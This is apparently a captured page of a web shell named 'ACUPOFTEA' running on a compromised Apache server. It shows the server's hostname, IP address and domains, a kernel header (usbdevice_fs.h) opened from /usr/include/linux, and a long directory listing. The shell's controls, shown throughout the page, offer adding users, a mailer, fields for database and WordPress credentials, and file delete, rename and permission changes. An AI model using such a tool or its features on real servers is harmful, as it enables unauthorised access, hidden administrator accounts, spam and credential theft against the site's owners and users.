System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
linux
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
usbdevice_fs.h
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */ /*****************************************************************************/ /* * usbdevice_fs.h -- USB device file system. * * Copyright (C) 2000 * Thomas Sailer (sailer@ife.ee.ethz.ch) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * * History: * 0.1 04.01.2000 Created */ /*****************************************************************************/ #ifndef _LINUX_USBDEVICE_FS_H #define _LINUX_USBDEVICE_FS_H #include <linux/types.h> #include <linux/magic.h> /* --------------------------------------------------------------------- */ /* usbdevfs ioctl codes */ struct usbdevfs_ctrltransfer { __u8 bRequestType; __u8 bRequest; __u16 wValue; __u16 wIndex; __u16 wLength; __u32 timeout; /* in milliseconds */ void *data; }; struct usbdevfs_bulktransfer { unsigned int ep; unsigned int len; unsigned int timeout; /* in milliseconds */ void *data; }; struct usbdevfs_setinterface { unsigned int interface; unsigned int altsetting; }; struct usbdevfs_disconnectsignal { unsigned int signr; void *context; }; #define USBDEVFS_MAXDRIVERNAME 255 struct usbdevfs_getdriver { unsigned int interface; char driver[USBDEVFS_MAXDRIVERNAME + 1]; }; struct usbdevfs_connectinfo { unsigned int devnum; unsigned char slow; }; struct usbdevfs_conninfo_ex { __u32 size; /* Size of the structure from the kernel's */ /* point of view. Can be used by userspace */ /* to determine how much data can be */ /* used/trusted. */ __u32 busnum; /* USB bus number, as enumerated by the */ /* kernel, the device is connected to. */ __u32 devnum; /* Device address on the bus. */ __u32 speed; /* USB_SPEED_* constants from ch9.h */ __u8 num_ports; /* Number of ports the device is connected */ /* to on the way to the root hub. It may */ /* be bigger than size of 'ports' array so */ /* userspace can detect overflows. */ __u8 ports[7]; /* List of ports on the way from the root */ /* hub to the device. Current limit in */ /* USB specification is 7 tiers (root hub, */ /* 5 intermediate hubs, device), which */ /* gives at most 6 port entries. */ }; #define USBDEVFS_URB_SHORT_NOT_OK 0x01 #define USBDEVFS_URB_ISO_ASAP 0x02 #define USBDEVFS_URB_BULK_CONTINUATION 0x04 #define USBDEVFS_URB_NO_FSBR 0x20 /* Not used */ #define USBDEVFS_URB_ZERO_PACKET 0x40 #define USBDEVFS_URB_NO_INTERRUPT 0x80 #define USBDEVFS_URB_TYPE_ISO 0 #define USBDEVFS_URB_TYPE_INTERRUPT 1 #define USBDEVFS_URB_TYPE_CONTROL 2 #define USBDEVFS_URB_TYPE_BULK 3 struct usbdevfs_iso_packet_desc { unsigned int length; unsigned int actual_length; unsigned int status; }; struct usbdevfs_urb { unsigned char type; unsigned char endpoint; int status; unsigned int flags; void *buffer; int buffer_length; int actual_length; int start_frame; union { int number_of_packets; /* Only used for isoc urbs */ unsigned int stream_id; /* Only used with bulk streams */ }; int error_count; unsigned int signr; /* signal to be sent on completion, or 0 if none should be sent. */ void *usercontext; struct usbdevfs_iso_packet_desc iso_frame_desc[0]; }; /* ioctls for talking directly to drivers */ struct usbdevfs_ioctl { int ifno; /* interface 0..N ; negative numbers reserved */ int ioctl_code; /* MUST encode size + direction of data so the * macros in <asm/ioctl.h> give correct values */ void *data; /* param buffer (in, or out) */ }; /* You can do most things with hubs just through control messages, * except find out what device connects to what port. */ struct usbdevfs_hub_portinfo { char nports; /* number of downstream ports in this hub */ char port [127]; /* e.g. port 3 connects to device 27 */ }; /* System and bus capability flags */ #define USBDEVFS_CAP_ZERO_PACKET 0x01 #define USBDEVFS_CAP_BULK_CONTINUATION 0x02 #define USBDEVFS_CAP_NO_PACKET_SIZE_LIM 0x04 #define USBDEVFS_CAP_BULK_SCATTER_GATHER 0x08 #define USBDEVFS_CAP_REAP_AFTER_DISCONNECT 0x10 #define USBDEVFS_CAP_MMAP 0x20 #define USBDEVFS_CAP_DROP_PRIVILEGES 0x40 #define USBDEVFS_CAP_CONNINFO_EX 0x80 #define USBDEVFS_CAP_SUSPEND 0x100 /* USBDEVFS_DISCONNECT_CLAIM flags & struct */ /* disconnect-and-claim if the driver matches the driver field */ #define USBDEVFS_DISCONNECT_CLAIM_IF_DRIVER 0x01 /* disconnect-and-claim except when the driver matches the driver field */ #define USBDEVFS_DISCONNECT_CLAIM_EXCEPT_DRIVER 0x02 struct usbdevfs_disconnect_claim { unsigned int interface; unsigned int flags; char driver[USBDEVFS_MAXDRIVERNAME + 1]; }; struct usbdevfs_streams { unsigned int num_streams; /* Not used by USBDEVFS_FREE_STREAMS */ unsigned int num_eps; unsigned char eps[0]; }; /* * USB_SPEED_* values returned by USBDEVFS_GET_SPEED are defined in * linux/usb/ch9.h */ #define USBDEVFS_CONTROL _IOWR('U', 0, struct usbdevfs_ctrltransfer) #define USBDEVFS_CONTROL32 _IOWR('U', 0, struct usbdevfs_ctrltransfer32) #define USBDEVFS_BULK _IOWR('U', 2, struct usbdevfs_bulktransfer) #define USBDEVFS_BULK32 _IOWR('U', 2, struct usbdevfs_bulktransfer32) #define USBDEVFS_RESETEP _IOR('U', 3, unsigned int) #define USBDEVFS_SETINTERFACE _IOR('U', 4, struct usbdevfs_setinterface) #define USBDEVFS_SETCONFIGURATION _IOR('U', 5, unsigned int) #define USBDEVFS_GETDRIVER _IOW('U', 8, struct usbdevfs_getdriver) #define USBDEVFS_SUBMITURB _IOR('U', 10, struct usbdevfs_urb) #define USBDEVFS_SUBMITURB32 _IOR('U', 10, struct usbdevfs_urb32) #define USBDEVFS_DISCARDURB _IO('U', 11) #define USBDEVFS_REAPURB _IOW('U', 12, void *) #define USBDEVFS_REAPURB32 _IOW('U', 12, __u32) #define USBDEVFS_REAPURBNDELAY _IOW('U', 13, void *) #define USBDEVFS_REAPURBNDELAY32 _IOW('U', 13, __u32) #define USBDEVFS_DISCSIGNAL _IOR('U', 14, struct usbdevfs_disconnectsignal) #define USBDEVFS_DISCSIGNAL32 _IOR('U', 14, struct usbdevfs_disconnectsignal32) #define USBDEVFS_CLAIMINTERFACE _IOR('U', 15, unsigned int) #define USBDEVFS_RELEASEINTERFACE _IOR('U', 16, unsigned int) #define USBDEVFS_CONNECTINFO _IOW('U', 17, struct usbdevfs_connectinfo) #define USBDEVFS_IOCTL _IOWR('U', 18, struct usbdevfs_ioctl) #define USBDEVFS_IOCTL32 _IOWR('U', 18, struct usbdevfs_ioctl32) #define USBDEVFS_HUB_PORTINFO _IOR('U', 19, struct usbdevfs_hub_portinfo) #define USBDEVFS_RESET _IO('U', 20) #define USBDEVFS_CLEAR_HALT _IOR('U', 21, unsigned int) #define USBDEVFS_DISCONNECT _IO('U', 22) #define USBDEVFS_CONNECT _IO('U', 23) #define USBDEVFS_CLAIM_PORT _IOR('U', 24, unsigned int) #define USBDEVFS_RELEASE_PORT _IOR('U', 25, unsigned int) #define USBDEVFS_GET_CAPABILITIES _IOR('U', 26, __u32) #define USBDEVFS_DISCONNECT_CLAIM _IOR('U', 27, struct usbdevfs_disconnect_claim) #define USBDEVFS_ALLOC_STREAMS _IOR('U', 28, struct usbdevfs_streams) #define USBDEVFS_FREE_STREAMS _IOR('U', 29, struct usbdevfs_streams) #define USBDEVFS_DROP_PRIVILEGES _IOW('U', 30, __u32) #define USBDEVFS_GET_SPEED _IO('U', 31) /* * Returns struct usbdevfs_conninfo_ex; length is variable to allow * extending size of the data returned. */ #define USBDEVFS_CONNINFO_EX(len) _IOC(_IOC_READ, 'U', 32, len) #define USBDEVFS_FORBID_SUSPEND _IO('U', 33) #define USBDEVFS_ALLOW_SUSPEND _IO('U', 34) #define USBDEVFS_WAIT_FOR_RESUME _IO('U', 35) #endif /* _LINUX_USBDEVICE_FS_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
..
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
android
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
byteorder
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
caif
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
can
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
cifs
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
dvb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
genwqe
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hdlc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hsi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
iio
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
isdn
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
mmc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_arp
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_bridge
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv4
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv6
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
nfsd
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
raid
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sched
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
spi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sunrpc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_act
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_ematch
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
usb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
wimax
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
a.out.h
text/x-c
6.73 KB
-rw-r--r--
2025-12-08 09:06:43
acct.h
text/x-c
3.65 KB
-rw-r--r--
2025-12-08 09:06:42
adb.h
text/x-c
1.11 KB
-rw-r--r--
2025-12-08 09:06:42
adfs_fs.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
affs_hardblocks.h
text/x-c
1.51 KB
-rw-r--r--
2025-12-08 09:06:40
agpgart.h
text/x-c
3.85 KB
-rw-r--r--
2025-12-08 09:06:41
aio_abi.h
text/x-c
3.34 KB
-rw-r--r--
2025-12-08 09:06:42
am437x-vpfe.h
text/x-c
3.59 KB
-rw-r--r--
2025-12-08 09:06:43
apm_bios.h
text/x-c
3.6 KB
-rw-r--r--
2025-12-08 09:06:43
arcfb.h
text/x-c
213 B
-rw-r--r--
2025-12-08 09:06:42
arm_sdei.h
text/x-c
2.69 KB
-rw-r--r--
2025-12-08 09:06:42
aspeed-lpc-ctrl.h
text/x-c
1.74 KB
-rw-r--r--
2025-12-08 09:06:41
atalk.h
text/x-c
1023 B
-rw-r--r--
2025-12-08 09:06:41
atm.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:40
atm_eni.h
text/x-c
648 B
-rw-r--r--
2025-12-08 09:06:40
atm_he.h
text/x-c
406 B
-rw-r--r--
2025-12-08 09:06:41
atm_idt77105.h
text/x-c
955 B
-rw-r--r--
2025-12-08 09:06:43
atm_nicstar.h
text/x-c
1.25 KB
-rw-r--r--
2025-12-08 09:06:40
atm_tcp.h
text/x-c
1.58 KB
-rw-r--r--
2025-12-08 09:06:42
atm_zatm.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:41
atmapi.h
text/x-c
952 B
-rw-r--r--
2025-12-08 09:06:42
atmarp.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:41
atmbr2684.h
text/x-c
3.19 KB
-rw-r--r--
2025-12-08 09:06:43
atmclip.h
text/x-c
576 B
-rw-r--r--
2025-12-08 09:06:40
atmdev.h
text/x-c
7.5 KB
-rw-r--r--
2025-12-08 09:06:43
atmioc.h
text/x-c
1.61 KB
-rw-r--r--
2025-12-08 09:06:41
atmlec.h
text/x-c
2.33 KB
-rw-r--r--
2025-12-08 09:06:41
atmmpc.h
text/x-c
4.13 KB
-rw-r--r--
2025-12-08 09:06:40
atmppp.h
text/x-c
639 B
-rw-r--r--
2025-12-08 09:06:42
atmsap.h
text/x-c
4.85 KB
-rw-r--r--
2025-12-08 09:06:41
atmsvc.h
text/x-c
1.81 KB
-rw-r--r--
2025-12-08 09:06:42
audit.h
text/x-c
19.92 KB
-rw-r--r--
2025-12-08 09:06:40
auto_dev-ioctl.h
text/x-c
4.87 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs.h
text/x-c
6.28 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs4.h
text/x-c
451 B
-rw-r--r--
2025-12-08 09:06:42
auxvec.h
text/x-c
1.56 KB
-rw-r--r--
2025-12-08 09:06:41
ax25.h
text/x-c
2.76 KB
-rw-r--r--
2025-12-08 09:06:43
b1lli.h
text/x-c
1.68 KB
-rw-r--r--
2025-12-08 09:06:41
batadv_packet.h
text/x-c
20.01 KB
-rw-r--r--
2025-12-08 09:06:41
batman_adv.h
text/x-c
11.7 KB
-rw-r--r--
2025-12-08 09:06:42
baycom.h
text/x-c
883 B
-rw-r--r--
2025-12-08 09:06:42
bcache.h
text/x-c
8.17 KB
-rw-r--r--
2025-12-08 09:06:41
bcm933xx_hcs.h
text/x-c
419 B
-rw-r--r--
2025-12-08 09:06:43
bfs_fs.h
text/x-c
1.85 KB
-rw-r--r--
2025-12-08 09:06:41
binfmts.h
text/x-c
628 B
-rw-r--r--
2025-12-08 09:06:40
blkpg.h
text/x-c
904 B
-rw-r--r--
2025-12-08 09:06:43
blktrace_api.h
text/x-c
4.59 KB
-rw-r--r--
2025-12-08 09:06:40
blkzoned.h
text/x-c
6.45 KB
-rw-r--r--
2025-12-08 09:06:42
bpf.h
text/x-c
223.3 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_common.h
text/x-c
1.33 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_perf_event.h
text/x-c
529 B
-rw-r--r--
2025-12-08 09:06:42
bpfilter.h
text/x-c
465 B
-rw-r--r--
2025-12-08 09:06:41
bpqether.h
text/x-c
981 B
-rw-r--r--
2025-12-08 09:06:42
bsg.h
text/x-c
2.44 KB
-rw-r--r--
2025-12-08 09:06:42
bt-bmc.h
text/x-c
572 B
-rw-r--r--
2025-12-08 09:06:42
btf.h
text/x-c
4.68 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs.h
text/x-c
28.24 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs_tree.h
text/x-c
24.69 KB
-rw-r--r--
2025-12-08 09:06:41
can.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:41
capability.h
text/x-c
13.2 KB
-rw-r--r--
2025-12-08 09:06:41
capi.h
text/x-c
3.05 KB
-rw-r--r--
2025-12-08 09:06:40
cciss_defs.h
text/x-c
3.2 KB
-rw-r--r--
2025-12-08 09:06:42
cciss_ioctl.h
text/x-c
2.7 KB
-rw-r--r--
2025-12-08 09:06:42
cdrom.h
text/x-c
28.18 KB
-rw-r--r--
2025-12-08 09:06:41
cec-funcs.h
text/x-c
52.64 KB
-rw-r--r--
2025-12-08 09:06:42
cec.h
text/x-c
36.81 KB
-rw-r--r--
2025-12-08 09:06:42
cfm_bridge.h
text/x-c
1.42 KB
-rw-r--r--
2025-12-08 09:06:43
cgroupstats.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:41
chio.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:43
close_range.h
text/x-c
377 B
-rw-r--r--
2025-12-08 09:06:42
cm4000_cs.h
text/x-c
1.76 KB
-rw-r--r--
2025-12-08 09:06:43
cn_proc.h
text/x-c
3.38 KB
-rw-r--r--
2025-12-08 09:06:42
coda.h
text/x-c
17.09 KB
-rw-r--r--
2025-12-08 09:06:42
coda_psdev.h
text/x-c
783 B
-rw-r--r--
2025-12-08 09:06:42
coff.h
text/x-c
12.18 KB
-rw-r--r--
2025-12-08 09:06:40
connector.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:41
const.h
text/x-c
788 B
-rw-r--r--
2025-12-08 09:06:40
coresight-stm.h
text/x-c
674 B
-rw-r--r--
2025-12-08 09:06:42
cramfs_fs.h
text/x-c
3.47 KB
-rw-r--r--
2025-12-08 09:06:42
cryptouser.h
text/x-c
3.31 KB
-rw-r--r--
2025-12-08 09:06:41
cuda.h
text/x-c
905 B
-rw-r--r--
2025-12-08 09:06:42
cyclades.h
text/x-c
16.71 KB
-rw-r--r--
2025-12-08 09:06:41
cycx_cfm.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:42
dcbnl.h
text/x-c
24.65 KB
-rw-r--r--
2025-12-08 09:06:41
dccp.h
text/x-c
6.29 KB
-rw-r--r--
2025-12-08 09:06:41
devlink.h
text/x-c
21.05 KB
-rw-r--r--
2025-12-08 09:06:41
dlm.h
text/x-c
2.49 KB
-rw-r--r--
2025-12-08 09:06:41
dlm_device.h
text/x-c
2.48 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_netlink.h
text/x-c
1.13 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_plock.h
text/x-c
894 B
-rw-r--r--
2025-12-08 09:06:42
dlmconstants.h
text/x-c
4.96 KB
-rw-r--r--
2025-12-08 09:06:43
dm-ioctl.h
text/x-c
11.13 KB
-rw-r--r--
2025-12-08 09:06:42
dm-log-userspace.h
text/x-c
14.83 KB
-rw-r--r--
2025-12-08 09:06:41
dma-buf.h
text/x-c
5.12 KB
-rw-r--r--
2025-12-08 09:06:41
dn.h
text/x-c
4.53 KB
-rw-r--r--
2025-12-08 09:06:41
dqblk_xfs.h
text/x-c
9.03 KB
-rw-r--r--
2025-12-08 09:06:41
edd.h
text/x-c
5.47 KB
-rw-r--r--
2025-12-08 09:06:42
efs_fs_sb.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:42
elf-em.h
text/x-c
2.14 KB
-rw-r--r--
2025-12-08 09:06:41
elf-fdpic.h
text/x-c
1.1 KB
-rw-r--r--
2025-12-08 09:06:42
elf.h
text/x-c
13.16 KB
-rw-r--r--
2025-12-08 09:06:41
elfcore.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:41
errno.h
text/x-c
23 B
-rw-r--r--
2025-12-08 09:06:42
errqueue.h
text/x-c
1.44 KB
-rw-r--r--
2025-12-08 09:06:42
erspan.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:41
ethtool.h
text/x-c
81.89 KB
-rw-r--r--
2025-12-08 09:06:42
ethtool_netlink.h
text/x-c
22.29 KB
-rw-r--r--
2025-12-08 09:06:42
eventpoll.h
text/x-c
2.67 KB
-rw-r--r--
2025-12-08 09:06:41
fadvise.h
text/x-c
842 B
-rw-r--r--
2025-12-08 09:06:40
falloc.h
text/x-c
3.5 KB
-rw-r--r--
2025-12-08 09:06:42
fanotify.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:40
fb.h
text/x-c
16.09 KB
-rw-r--r--
2025-12-08 09:06:42
fcntl.h
text/x-c
4.08 KB
-rw-r--r--
2025-12-08 09:06:43
fd.h
text/x-c
11.4 KB
-rw-r--r--
2025-12-08 09:06:41
fdreg.h
text/x-c
5.29 KB
-rw-r--r--
2025-12-08 09:06:41
fib_rules.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:40
fiemap.h
text/x-c
2.71 KB
-rw-r--r--
2025-12-08 09:06:41
filter.h
text/x-c
2.16 KB
-rw-r--r--
2025-12-08 09:06:43
firewire-cdev.h
text/x-c
42.86 KB
-rw-r--r--
2025-12-08 09:06:41
firewire-constants.h
text/x-c
3.16 KB
-rw-r--r--
2025-12-08 09:06:41
flat.h
text/x-c
2.1 KB
-rw-r--r--
2025-12-08 09:06:41
fou.h
text/x-c
694 B
-rw-r--r--
2025-12-08 09:06:42
fpga-dfl.h
text/x-c
8.52 KB
-rw-r--r--
2025-12-08 09:06:43
fs.h
text/x-c
13.11 KB
-rw-r--r--
2025-12-08 09:06:42
fsl_hypervisor.h
text/x-c
7.13 KB
-rw-r--r--
2025-12-08 09:06:42
fsmap.h
text/x-c
4.29 KB
-rw-r--r--
2025-12-08 09:06:42
fuse.h
text/x-c
22.92 KB
-rw-r--r--
2025-12-08 09:06:41
futex.h
text/x-c
4.88 KB
-rw-r--r--
2025-12-08 09:06:43
gameport.h
text/x-c
897 B
-rw-r--r--
2025-12-08 09:06:42
gen_stats.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:42
genetlink.h
text/x-c
2.12 KB
-rw-r--r--
2025-12-08 09:06:42
gfs2_ondisk.h
text/x-c
14.4 KB
-rw-r--r--
2025-12-08 09:06:41
gigaset_dev.h
text/x-c
1.41 KB
-rw-r--r--
2025-12-08 09:06:41
gpio.h
text/x-c
6.59 KB
-rw-r--r--
2025-12-08 09:06:42
gsmmux.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:40
gtp.h
text/x-c
681 B
-rw-r--r--
2025-12-08 09:06:41
hash_info.h
text/x-c
921 B
-rw-r--r--
2025-12-08 09:06:42
hdlc.h
text/x-c
637 B
-rw-r--r--
2025-12-08 09:06:42
hdlcdrv.h
text/x-c
2.84 KB
-rw-r--r--
2025-12-08 09:06:41
hdreg.h
text/x-c
22.17 KB
-rw-r--r--
2025-12-08 09:06:41
hid.h
text/x-c
1.86 KB
-rw-r--r--
2025-12-08 09:06:41
hiddev.h
text/x-c
6.2 KB
-rw-r--r--
2025-12-08 09:06:42
hidraw.h
text/x-c
1.95 KB
-rw-r--r--
2025-12-08 09:06:41
hpet.h
text/x-c
743 B
-rw-r--r--
2025-12-08 09:06:41
hsr_netlink.h
text/x-c
1.06 KB
-rw-r--r--
2025-12-08 09:06:43
hw_breakpoint.h
text/x-c
742 B
-rw-r--r--
2025-12-08 09:06:42
hyperv.h
text/x-c
10.89 KB
-rw-r--r--
2025-12-08 09:06:42
hysdn_if.h
text/plain
1.35 KB
-rw-r--r--
2025-12-08 09:06:42
i2c-dev.h
text/x-c
2.55 KB
-rw-r--r--
2025-12-08 09:06:42
i2c.h
text/x-c
6.96 KB
-rw-r--r--
2025-12-08 09:06:42
i2o-dev.h
text/x-c
11.28 KB
-rw-r--r--
2025-12-08 09:06:41
i8k.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:43
icmp.h
text/x-c
2.91 KB
-rw-r--r--
2025-12-08 09:06:41
icmpv6.h
text/x-c
3.94 KB
-rw-r--r--
2025-12-08 09:06:43
idxd.h
text/x-c
8.22 KB
-rw-r--r--
2025-12-08 09:06:40
if.h
text/x-c
10.65 KB
-rw-r--r--
2025-12-08 09:06:41
if_addr.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:41
if_addrlabel.h
text/x-c
721 B
-rw-r--r--
2025-12-08 09:06:42
if_alg.h
text/x-c
946 B
-rw-r--r--
2025-12-08 09:06:41
if_arcnet.h
text/x-c
3.63 KB
-rw-r--r--
2025-12-08 09:06:42
if_arp.h
text/x-c
6.42 KB
-rw-r--r--
2025-12-08 09:06:41
if_bonding.h
text/x-c
5.17 KB
-rw-r--r--
2025-12-08 09:06:41
if_bridge.h
text/x-c
19.06 KB
-rw-r--r--
2025-12-08 09:06:42
if_cablemodem.h
text/x-c
986 B
-rw-r--r--
2025-12-08 09:06:42
if_eql.h
text/x-c
1.32 KB
-rw-r--r--
2025-12-08 09:06:41
if_ether.h
text/x-c
8.05 KB
-rw-r--r--
2025-12-08 09:06:41
if_fc.h
text/x-c
1.7 KB
-rw-r--r--
2025-12-08 09:06:43
if_fddi.h
text/x-c
3.66 KB
-rw-r--r--
2025-12-08 09:06:42
if_frad.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:41
if_hippi.h
text/x-c
4.14 KB
-rw-r--r--
2025-12-08 09:06:40
if_infiniband.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:43
if_link.h
text/x-c
30.28 KB
-rw-r--r--
2025-12-08 09:06:42
if_ltalk.h
text/x-c
210 B
-rw-r--r--
2025-12-08 09:06:41
if_macsec.h
text/x-c
5.7 KB
-rw-r--r--
2025-12-08 09:06:41
if_packet.h
text/x-c
7.73 KB
-rw-r--r--
2025-12-08 09:06:42
if_phonet.h
text/x-c
424 B
-rw-r--r--
2025-12-08 09:06:41
if_plip.h
text/x-c
660 B
-rw-r--r--
2025-12-08 09:06:41
if_ppp.h
text/x-c
29 B
-rw-r--r--
2025-12-08 09:06:41
if_pppol2tp.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:41
if_pppox.h
text/x-c
4.76 KB
-rw-r--r--
2025-12-08 09:06:41
if_slip.h
text/x-c
872 B
-rw-r--r--
2025-12-08 09:06:42
if_team.h
text/x-c
2.54 KB
-rw-r--r--
2025-12-08 09:06:41
if_tun.h
text/x-c
4 KB
-rw-r--r--
2025-12-08 09:06:41
if_tunnel.h
text/x-c
4.41 KB
-rw-r--r--
2025-12-08 09:06:41
if_vlan.h
text/x-c
1.79 KB
-rw-r--r--
2025-12-08 09:06:41
if_x25.h
text/x-c
881 B
-rw-r--r--
2025-12-08 09:06:43
if_xdp.h
text/x-c
2.94 KB
-rw-r--r--
2025-12-08 09:06:43
ife.h
text/x-c
351 B
-rw-r--r--
2025-12-08 09:06:41
igmp.h
text/x-c
2.99 KB
-rw-r--r--
2025-12-08 09:06:41
ila.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:41
in.h
text/x-c
9.78 KB
-rw-r--r--
2025-12-08 09:06:41
in6.h
text/x-c
7.26 KB
-rw-r--r--
2025-12-08 09:06:42
in_route.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
inet_diag.h
text/x-c
4.56 KB
-rw-r--r--
2025-12-08 09:06:40
inotify.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:42
input-event-codes.h
text/x-c
27.94 KB
-rw-r--r--
2025-12-08 09:06:42
input.h
text/x-c
15.61 KB
-rw-r--r--
2025-12-08 09:06:42
io_uring.h
text/x-c
6.06 KB
-rw-r--r--
2025-12-08 09:06:41
ioctl.h
text/x-c
163 B
-rw-r--r--
2025-12-08 09:06:41
iommu.h
text/x-c
4.79 KB
-rw-r--r--
2025-12-08 09:06:43
ip.h
text/x-c
4.62 KB
-rw-r--r--
2025-12-08 09:06:43
ip6_tunnel.h
text/x-c
1.91 KB
-rw-r--r--
2025-12-08 09:06:41
ip_vs.h
text/x-c
13.31 KB
-rw-r--r--
2025-12-08 09:06:42
ipc.h
text/x-c
2.05 KB
-rw-r--r--
2025-12-08 09:06:42
ipmi.h
text/x-c
15.08 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_bmc.h
text/x-c
464 B
-rw-r--r--
2025-12-08 09:06:42
ipmi_msgdefs.h
text/x-c
3.35 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_ssif_bmc.h
text/x-c
441 B
-rw-r--r--
2025-12-08 09:06:40
ipsec.h
text/x-c
947 B
-rw-r--r--
2025-12-08 09:06:43
ipv6.h
text/x-c
3.87 KB
-rw-r--r--
2025-12-08 09:06:40
ipv6_route.h
text/x-c
1.86 KB
-rw-r--r--
2025-12-08 09:06:42
ipx.h
text/x-c
2.29 KB
-rw-r--r--
2025-12-08 09:06:42
irqnr.h
text/plain
104 B
-rw-r--r--
2025-12-08 09:06:40
isdn.h
text/x-c
5.64 KB
-rw-r--r--
2025-12-08 09:06:41
isdn_divertif.h
text/x-c
1.17 KB
-rw-r--r--
2025-12-08 09:06:42
isdn_ppp.h
text/x-c
1.88 KB
-rw-r--r--
2025-12-08 09:06:42
isdnif.h
text/x-c
2.31 KB
-rw-r--r--
2025-12-08 09:06:40
iso_fs.h
text/x-c
6.33 KB
-rw-r--r--
2025-12-08 09:06:41
isst_if.h
text/x-c
5.26 KB
-rw-r--r--
2025-12-08 09:06:41
ivtv.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:41
ivtvfb.h
text/x-c
1.18 KB
-rw-r--r--
2025-12-08 09:06:41
jffs2.h
text/x-c
6.85 KB
-rw-r--r--
2025-12-08 09:06:41
joystick.h
text/x-c
3.35 KB
-rw-r--r--
2025-12-08 09:06:42
kcm.h
text/x-c
822 B
-rw-r--r--
2025-12-08 09:06:41
kcmp.h
text/x-c
522 B
-rw-r--r--
2025-12-08 09:06:42
kcov.h
text/x-c
1.07 KB
-rw-r--r--
2025-12-08 09:06:42
kd.h
text/x-c
6.11 KB
-rw-r--r--
2025-12-08 09:06:42
kdev_t.h
text/x-c
383 B
-rw-r--r--
2025-12-08 09:06:42
kernel-page-flags.h
text/x-c
900 B
-rw-r--r--
2025-12-08 09:06:41
kernel.h
text/x-c
438 B
-rw-r--r--
2025-12-08 09:06:41
kernelcapi.h
text/x-c
1019 B
-rw-r--r--
2025-12-08 09:06:43
kexec.h
text/x-c
1.79 KB
-rw-r--r--
2025-12-08 09:06:42
keyboard.h
text/x-c
12.48 KB
-rw-r--r--
2025-12-08 09:06:41
keyctl.h
text/x-c
